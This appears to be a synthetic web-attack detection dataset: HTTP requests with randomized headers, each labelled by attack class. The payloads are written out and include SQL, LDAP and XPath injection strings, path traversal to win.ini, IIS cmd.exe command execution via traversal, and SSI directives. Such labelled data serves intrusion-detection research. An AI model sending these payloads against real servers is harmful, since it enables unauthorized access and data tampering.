From: hzioi@etsrec.cz
If-Modified-Since: Thu, 23 Apr 09 02:03:27 GMT
If-Unmodified-Since: Fri, 20 Apr 07 15:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Oct 04 21:13:36 UTC
Max-Forwards: 0
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: NTLM a29xbGVsTk9odHNPdGFuNGVsaGRlYWhuN1JvaXBqc3RzZ24=
Range: 79-,-25900
Referer: /o3fim6/kdidlea/ojoA0edi.jpeg
TE: trailers,gzip;q=0.1
Trailer: Pragma
User-Agent: eeckis (obvIrv; r39TU0; s.UL2x3; t0fitoBa; oMoyt9_-)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3843x971
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: compress
Upgrade: fdzt6r/1.6, f4eN8/7.9
Warning: 136 11.147.101.120:8 "azxwWdgjetsnwgt6ecfc" "Sun, 05 Nov 06 18:36:55 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49371
Start - Id: 41587
class: SqlInjection
GET /tksidlioo/lfTT/cat7JDWf/nqdlFnn5KotS7dy/spCnl0W6ZVa4j/boZk/.Xk/exlFP2awuDSZ2/hJswIk/include1sSVunionsystemZZ9/hm.msf?Zh8GS-3Cwlsa=%27++++union+++select+++++sum%28tlOqhq%29+++from+++sist--&di=aoyaSr HTTP/1.1
Host: www.peel.com
Connection: close
Accept: text/*;q=0.6, audio/x-wav
Accept-Charset: x-mac-cyrillic
Accept-Encoding: identity, compress;q=0.0, gzip
Accept-Language: ar-rtegynm;q=0.9, Nsd5siti-ltid;q=0.7
Cache-Control: max-age=7
Client-ip: 38.173.11.46
Cookie: eo=i2P-UuvC_H
Cookie2: $Version="8"
Date: Wed, 24 Dec 08 09:45:02 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: eRcnhyt=clseteee
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Tue, 02 May 06 21:32:11 CET
If-Match: *
If-None-Match: *
If-Range: "GmVN6FHhcyf_pMA"
Max-Forwards: 0
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: Basic MWdkZjpob2lydA==
Range: 572-0
Referer: /HprIt6r/Tt97eszo/7tifysek.mp3
TE: trailers
Trailer: If-Range
User-Agent: 2la5ns4iet1ienreense
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3931x2579
Via: 5.3 www.alerninY.gif
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41587
Start - Id: 37343
class: LdapInjection
GET /abrtXer9/aSen/eiwehsdecs5se/trTLEabeiofciphua/mGz@phpdeleteQ/Clttfnleu/rw_V_7GPBE/o2/easmplmtv0eLeiode/8t.kJJfJCl76t7_Jm_.cfm? HTTP/1.0
Host: 127.103.200.70
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: 7z-fftz, au9gefel-eQ;q=0.6, e-i;q=0.0, m4aknIh-ofso, dat-ymh6hN;q=0.0
Cache-Control: no-transform
Client-ip: 57.5.226.35
Cookie: ddtedmjkahas=147;cg1etEiTl=596594;eyeh=es+mocha
Cookie2: $Version="7"
Date: Sat, 14 Jul 07 15:16:54 UTC
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: tweTge
From: elbo@eieuetfntT.fr
If-Modified-Since: Sat, 07 May 05 13:17:23 CET
If-Unmodified-Since: Fri, 31 Mar 06 18:16:10 UTC
If-Match: "tIG2UZRRBkcFX-2Uqy"
If-None-Match: *
If-Range: "U9sICyoJWi@jK-N"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: smLhnee=rtho
Proxy-Authorization: NTLM N2RvZ3JvaElyc2k2Tjg4YjRhZjltbDh0dWo1aXllbGRJb2VzdWludmVl
Authorization: eesos squiMtiM=e8thrye
Range: -04795,-66
Referer: /3wleredt/nnoto.gz
TE: deflate
Trailer: Range
User-Agent: )(  |    (   cn=*o 'brien*    )(mail=*o 'brien*    )    
UA-CPU: 68000
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: etyaca/8.4 172.61.23.61
Transfer-Encoding: compress
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37343
Start - Id: 49761
class: XPathInjection
GET /trcW4y5W6/aW6xWVZlwtCPBN73ud-/3nwMtsspEh9etcroen/5jeseneOtuaSmulelelb/a1JR20S7.cfm?6ebb86ihTtuws=gdgu&rinm9lititsi=nuosajwcihEsis&aihviepre=7ipfrdnsMuDos&fea4yekme=g8uvEKWn77g6&a2tn=oIte&YAPT2dosYo1=ih&otjie3rttabk=t2Mse&cqIcrstii=utdqgQs%27+++++or++++dihE%2FcRs%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D824%5D++++or+%27sfl%27%3D++%27 HTTP/1.0
Host: 17.146.232.58
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9630
Client-ip: 149.198.73.153
Cookie: yOYecho03=jt;g9f=32;tn=hZcams
Cookie2: $Version="367"
Date: Thu, 07 Jan 10 05:36:06 GMT
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 6itn=bdoaua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Sat, 23 Jun 07 08:01:21 CET
If-Unmodified-Since: Sun, 17 Jul 05 10:57:07 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 186464-,-8
Referer: /iiMdw/rwWrnins/ietu.pl
TE: deflate
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 1.0; gE-0d; rv:0.7.7) Gecko/40074286
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3095x7377
Via: tfyr/4.6 www.jCtaf.js, 0.4 www.zdjlrdQm.png
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49761
Start - Id: 42279
class: SqlInjection
GET /eV2aQO/syhrtnchryrtOubhs/6thdtdeiutaPnbn/tOcnalyRcl0rdio0d/oOJ0cJdz%u.shtml?r70nnlth=mafbe7mruascriptDy&cvAafesso1olrh=+0ugh&iYlfi=gwinntc&DetfihoisnHt=nnodeljs%5CtidNee%3E+%3EedhW&4h8ieoaple=eUhhxM5u&dyeiefeecs=iR9s4EW&autoexecUpu0E=7eNelsinehkcaoh&easadW9rwqces=%27%3B+insert++++into++++tm++values%28666%2C%27htd0%27%2C%27gxuam%27%2C0xfffff%29 HTTP/1.1
Host: www.qiiaK7dto.org
Connection: asfreeeh
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, deflate, gzip
Accept-Language: ov1ceg-oohs;q=0.0, i2lh8i-E, 3rItd-Ietevla, w-tixhvm
Cache-Control: no-transform
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="649"
Date: Sun, 21 Mar 10 22:11:16 CET
ETag: "Poh1.C66XqM675xtZ"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "TCjUqLG2W-yNXEXIO0B"
If-None-Match: *
If-Range: *
Max-Forwards: 5857
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 17-374188
Referer: /essnEo/tiur.swf
TE: gzip;q=0.0,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/0.1 (compatible; MSIE 0.4; SunOS sun4u; hlmemg; ltitat)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0775x379
Via: FTP/3.9 www.ltsif7et.css, 5.4 www.g5osm.jpg
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 221.156.21.94
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42279
Start - Id: 45124
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.qsdNI.st
Connection: ZNiraom
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-EegHNhsn, tbh3ertu-dw2;q=0.9, eo7-en;q=0.2, oeyLra-fnslvvt;q=0.2, 3vean-Ua;q=0.0
Cache-Control: taLhda='S'
Client-ip: 223.196.253.50
Cookie: htrm7rNhnib=lslek;trM=uooDI~wp-ydfdn;sne=311842;homeuUiqV.NZk=91616317;wOmoPvl=691609;retst=t-Wt9tnmX
Cookie2: $Version="70"
Date: Fri, 25 Aug 06 09:06:00 UTC
ETag: "4LiPumcHRxrP39K9J"
Expect: 100-continue
From: lmfapce@abHed.be
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Sat, 24 Dec 05 24:43:09 GMT
If-Match: *
If-None-Match: "UmH3kYZ5rR1lfwb4.D"
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic aGhjaE9TOnNpYWRvdWk=
Range: -3,456-488022
Referer: http://qry2ulo.ch/se1qdh/E1sxo/hosjotmg/soovkep/5exen3sT.png
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: stmO/2.2
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: compress
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45124
Start - Id: 37483
class: LdapInjection
GET /haFJdotocmwi8nrsn.js? HTTP/1.0
Host: www.yriwroeot.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, windows-1252;q=0.9, x-mac-arabic;q=0.2, windows-1253, big5;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: 2-tavkbne;q=0.6, a5nuwn-h;q=0.3
Cache-Control: no-cache
Client-ip: 109.40.195.249
Cookie: aml=08764229;cABxM.W=4ohrg)(&(objectClass    = eS*)
Cookie2: $Version="263"
Date: Fri, 01 Jan 10 22:57:35 CET
ETag: "Ntc.ibaiws6QJU7v"
Expect: ccve0ahu=joiosvw
From: i2eeh@yhiguo.be
If-Modified-Since: Tue, 22 Jul 08 15:23:20 CET
If-Unmodified-Since: Wed, 07 Jan 09 19:42:26 GMT
If-Match: "rJagS4cD3n-jn5TGg"
If-None-Match: "prOTEOAc7DIMVQ0FZO3"
If-Range: Sun, 11 Jan 09 08:53:29 UTC
Max-Forwards: 7119
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: saji kiiyesEn=ihaZt
Authorization: Basic YWlkbm5hOmlhbWU=
Range: 243-
Referer: /Aa9u/olkEng/tgqmt0ne/sa6Ysddu.css
TE: trailers,gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.7 (compatible; Konqueror/3.5; Open BSD i386; o7dhiy; 1Gttcit; tacs8erTa)
UA-Disp: 637,5395,8
UA-OS: Windows 95
UA-Color: color32
Via: 7.4 119.198.188.255, HTTP/4.0 183.26.145.168
Transfer-Encoding: fqonn
Upgrade: dt3/2.5, dusnc/0.7, l7cavf/3.9, uenS/8.7
Warning: 337 37.230.145.241 "tteze3s" "Fri, 08 Feb 08 18:09:32 CET"
X-Forwarded-For: 84.127.146.130
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37483
Start - Id: 42281
class: SqlInjection
GET /tQ/r_/veeseUatwwwo/rcp4cTRGPgS.FTDGz/ocemloTialUzthrl6.css?ide3=7llcnb1jo9ltbottae&oe0thapdevsu=in+hgc%7Es4b8zg9re&esohffnIt=o%2BS%2B&Silfnerehdhlb=1edh&Hy=dyEczfa7isiollqorb&tVioa8ntYhenkl=%27%3B+++shutdown--&beagmgctXshe=ngme&SgUVI=le5FroTeht6i4e&XCsmV=81 HTTP/1.0
Host: www.oi7che.org
Connection: rmlJbt
Accept: text/xml;q=0.1, text/xml, audio/x-wav
Accept-Charset: x-mac-roman
Accept-Encoding: deflate, deflate;q=0.9, compress, identity, compress
Accept-Language: hA-tzdwjn8;q=0.5
Cache-Control: min-fresh=66510
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="649"
Date: Fri, 30 Jan 04 02:32:44 CET
ETag: "Poh1.C66XqM675xtZ"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "tA75GAYXQz-gxe1"
If-None-Match: *
If-Range: *
Max-Forwards: 5857
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: -97,064827-802
Referer: http://aLrcxeo.st/neiglao/ozhl.nsf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: ichixe1
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9352x3948
Via: FTP/3.9 www.ltsif7et.css, 5.4 www.g5osm.jpg
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 221.156.21.94
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42281
Start - Id: 35216
class: SqlInjection
GET /e6jT3lX/ap@ngZ80o/eQVRMDGDOsMpyHCVoJF/zEcBOOsoQ0-YVUp.mspx?terGtr3iiQos9=%27+++OR++++%27t8y3%27++%3D%27&lishjrelljJeit=hDIXPAX4&Esos1s=28616&8isa=tM&yl1whht=0qa3u9o&jNVa3I9knlog=03&Lk2XLgF2I6=pst&ntdy=0dnAidtiiHxmlr&hifegSoah=++rtcmddai6isA%3C&lrtjEoftso=59&eor=552607&iKXZ=h%7Ce HTTP/1.0
Host: www.8une3sf.biz
Connection: hoeai
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.0, deflate;q=0.4, gzip
Accept-Language: uUed-ee;q=0.2, ea2ssnm-xet3, tosbj-iino;q=0.4, llvaa-E4aqcLp;q=0.4
Cache-Control: max-stale
Client-ip: 247.223.116.97
Cookie: ne9oe=oFif0j
Cookie2: $Version="53"
Date: Sun, 30 Sep 07 05:07:02 GMT
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 04 Nov 09 01:51:40 GMT
If-Unmodified-Since: Sun, 23 May 04 08:17:57 UTC
If-Match: *
If-None-Match: *
If-Range: "kd9TaOn9Hi2WMX@XmAwq"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: thhet2=qe
Proxy-Authorization: eTi1ny Jxi3piru=smaxcs
Authorization: Basic R2J5NnRpbzp3bmVz
Range: -30216,36258-
Referer: /ndoperii/bttwrOg/z8tali/nwoatuE.cfm
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 2.7; le-4k; rv:9.3.0) Gecko/80298952
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: compress
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35216
Start - Id: 48378
class: XPathInjection
GET /_4IqLK2q.etcPk6tS/8oW.sh?dhltfor=s&oaeytx=%27%29t%25&tCd9=1649&DwtSpiy6sibnoh=+ltgesn8eRbnc7%29&tnTnf=wouo&sewnmgGttgun=odYV9dEtKCo&MzYM2id=75182 HTTP/1.0
Host: 185.127.201.106:80
Connection: keep-alive
Accept: application/*;q=0.5, audio/*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: compress
Accept-Language: t-yraoCdtu, avoda-mee;q=0.3
Cache-Control: no-cache
Client-ip: 212.136.163.255
Cookie: uoh4is=cwHNq;EUPeyRUI9K7=oHa7eo3a c0;apacbdfijtao=ghytckevMlWtaheoA;J7dautoexeclogyNC=7;opAhrunuttTs5a=iioniha:oriaIe$a6pu
Cookie2: $Version="58"
Date: Sun, 15 Jun 08 09:40:35 GMT
ETag: "tpy_4UlkJYVHfTmi"
Expect: etrcit=rdglo;dAazrnm=Yi0l
From: rnjltn@certi8ho.ch
If-Modified-Since: Sun, 31 Jan 10 15:15:12 UTC
If-Unmodified-Since: Wed, 07 Jul 04 16:47:31 GMT
If-Match: "UAQALN8S@ONUi4RAloM5"
If-None-Match: *
If-Range: Thu, 13 Nov 08 23:14:13 CET
Max-Forwards: 78
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest username="aOiaWnc"
Authorization: Digest cnonce="admejs"
Referer: /yisow/yreoextn/usaOusdr/eh0or/uexcroo.dll
TE: trailers
Trailer: Trailer
User-Agent: 84118     or  1< eu6s/b/iAnt/child::text()[position()=386]  or 4='] | /* | /foo[bar='
UA-Disp: 0304,7705,8
UA-Pixels: 193x0725
Via: HTTP/0.9 86.138.102.12
Transfer-Encoding: compress
Upgrade: x7int/9.3, ecge/6.0, 9hOS/7.9, Ipthab/8.6
Warning: 750 www.s5it.tiff "w1tzmadtlta" 
X-Serial-Number: 63375075404459251

null

End - Id: 48378
Start - Id: 40839
class: SSI
GET /sJ6C0dlzEvIYfhSBB_rl/Elpaanezaediev16moqi/nIzCriframeka0Forlxp_B/sctOtmcootqeEe/ehYyBm4mojrWCX-fosU/laHGE/WtE2gaoRei9TI5l/hmqk/rNL5D/J_Ht8TSryeW/tWMXdu8/ymhllhee6poirhNa1cof.htm?o1eEoEniay4=nsmuh&u0oocEafrr=iha&3tm8ir=%3C%21--+%23odbc++++connect%3D%22secnCp%2Csr%2C1tMru%22++++statement%3D%22select+++*++++from+++++pt%22--%3E&lunzl=tcw%3Cniilt2f5&enO3tna=502049541&4nhkjoebN=1037029&emwaphrWn=connectsesstyleinbepealKlt%5Dtelnet&nhyue=sae%3Emho&ncnaxaheieW=00 HTTP/1.1
Host: www.tttw.biz
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-2022-kr;q=0.5, windows-1253;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 75.99.25.245
Cookie: uhttpsntQFON@sK=8;ScohtNa2tcr4=495574
Cookie2: $Version="353"
Date: Mon, 05 May 08 09:11:34 GMT
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: ieoa@hH3oh2lcin.de
If-Modified-Since: Sat, 29 Jan 05 10:25:30 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "xRhFoymkJFIDpQW"
If-None-Match: "tnZZKAV1Q4c5di7"
If-Range: "HlPSI7Rk23EzvKADRl"
Max-Forwards: 340
MIME-Version: 9.0
Pragma: nr='g6hat'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Digest response="Fd135D9A2ecDC400dCdAF41A7E0080dE"
Range: 4-703669
Referer: http://www.6dcT.it/aetot.jpg
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: uizNJ_k http://www.dphes.org
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: gzip
Upgrade: smTMae/0.2
Warning: 409 198.101.208.57 "eean61TLsanwsEti" "Thu, 01 Apr 10 06:52:14 GMT"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40839
Start - Id: 43970
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: 204.57.4.178:80
Connection: 5awb
Accept: video/quicktime, text/*, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5073
Client-ip: 25.103.27.234
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Sat, 27 Dec 08 01:38:47 GMT
ETag: "LAE8hRzfOVdr@oFY"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Sun, 15 Apr 07 05:09:22 UTC
If-Unmodified-Since: Sat, 11 Apr 09 23:31:56 GMT
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Fri, 04 Mar 05 16:36:47 UTC
Max-Forwards: 0
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="bCb71bf84af70Cd0eF014Adf964Ab7FA"
Range: 2873-08
Referer: /qx83/o4cbaH/itrue3ci/obs1/Wo5syerf.jsp
TE: deflate;q=0.4,trailers
Trailer: Referer
User-Agent: Mozilla/1.4 (compatible; MSIE 9.1; Solaris; tbwia)
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: HTTP/8.2 www.qho7.html, teni/5.9 www.wge4E.jpeg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43970
Start - Id: 48386
class: XPathInjection
GET /e_2FCF2Mmwvtg8Jl.v/nibDHNaX9/lu5lghdSAyty/drX4FCyum2utu5nWJKQ-/hNf/UwZ64ANIrhZ-OrK/vxUw/gi5el/eDcGYWX1bm/zDbinX8/UWjGdYccY.php4?eejqTnwg=ePesia&Xxbeeooliv=tyb6qof2ejd&oaiuaanhOi7w=15627 HTTP/1.1
Host: www.uunhnorhEr.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.6, x-mac-cyrillic;q=0.3
Accept-Encoding: *
Accept-Language: rtwo-rle;q=0.4, iBuW-1, cic5-saBn
Cache-Control: no-store
Client-ip: 217.6.147.85
Cookie: deue=62037504;eGot4glh=049   or     vilu/m0tYn1/g/child::node()[position()=758]    or    217=;tEfYsiieyn2Wee=55;ie=ot&;fmHhf4B=tnoed
Cookie2: $Version="356"
Date: Sat, 26 Mar 05 08:16:53 GMT
ETag: "ihXg.rtvd__-N6YgAUA"
From: hxesydot@eh4weelft.gov
If-Modified-Since: Tue, 12 May 09 20:07:17 GMT
If-Unmodified-Since: Sat, 28 Aug 04 13:37:20 CET
If-Match: *
If-None-Match: "RQr.bMGRet.Tjukx"
If-Range: Tue, 12 May 09 08:16:20 UTC
Max-Forwards: 6
Pragma: ie1emn='tag'
Referer: /s1rif/eddbxt4/boese3l7/mRaeei/ba7a.cgi
TE: trailers,trailers,gzip
User-Agent: Mozilla/4.8 (compatible; ssMbndi; Mac OS X; eta5)
UA-CPU: 68000
UA-Color: color8
UA-Pixels: 803x2412
Via: 4l5nc/5.6 www.kapa.png:42218
Transfer-Encoding: otfer

null

End - Id: 48386
Start - Id: 43863
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 39.15.129.60:80
Connection: keep-alive
Accept: video/*, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity, identity, deflate;q=0.9, gzip;q=0.5
Accept-Language: utn-wtd, 3oa-o2oods5e, anbqePn-Re7c;q=0.2, b-60a6vec
Cache-Control: min-fresh=8634
Client-ip: 165.236.64.199
Cookie: deahOtuIelL=sngmhdr;n2d=efs.Ho.frOTK;rensaytiinyhaga=em4epsTcufRae;h2eUimhkeh=sa%I;relerBkczmou=onl;b09EY292=5Dehtaccesf:md
Cookie2: $Version="8"
Date: Mon, 02 Feb 09 10:10:51 CET
ETag: "dGEC@BIj22_xTSaE@"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: *
If-None-Match: "ZJLZhg2yTBia3IW"
If-Range: Fri, 25 Aug 06 12:17:59 UTC
Max-Forwards: 2336
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Digest qop=tTfrtNsH
Range: 91796-,027282-114595
Referer: http://aoAeo.de/efabI/trra9/rjgh.wav
TE: trailers
Trailer: User-Agent
User-Agent: eaUotdGkd6
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: gZ1naf/1.2 www.whufar.js
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43863
Start - Id: 39130
class: SSI
GET /9exec8KwvNY1UosV2/ws/a735M5/jlPih8i/CncYFwWupwO%umCI/tNsathaaseooeResoh/tqutB4l09.@67T/fd3h-U7sIY/_YRKm3.js?YLMnhttpL=itti&teqieinrxcnNaf=072177&XhsVfmQB1=n8oxZTll&zawre=9r+i%5Cmk2b1qp%3Ehxebodyscriptlib&scoeyvsea81pcly=6577 HTTP/1.0
Host: www.hejt59oe.be
Connection: elogotWt
Accept: */*;q=0.3
Accept-Charset: cp-932, x-mac-cyrillic, iso-8859-8-i;q=0.7, windows-1250;q=0.7
Accept-Encoding: gzip;q=0.2, compress
Accept-Language: <!--#email fromhost="www.hadogwa.com" tohost="mailbox.ttv.com" message="napi seiodee otcMIvm sjq" fromaddress="taEEaf.com" toaddress="ddubs.epO.com" subject="h" sender="0m.com" replyto="dntdm.com" cc="bja" inreplyto="7nad 2e5e sl" id="w8irnmail" -->
Cache-Control: only-if-cached
Client-ip: 9.166.171.211
Date: Thu, 24 Jul 08 05:25:49 GMT
Expect: 100-continue
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Tue, 25 Aug 09 11:34:30 GMT
If-Range: *
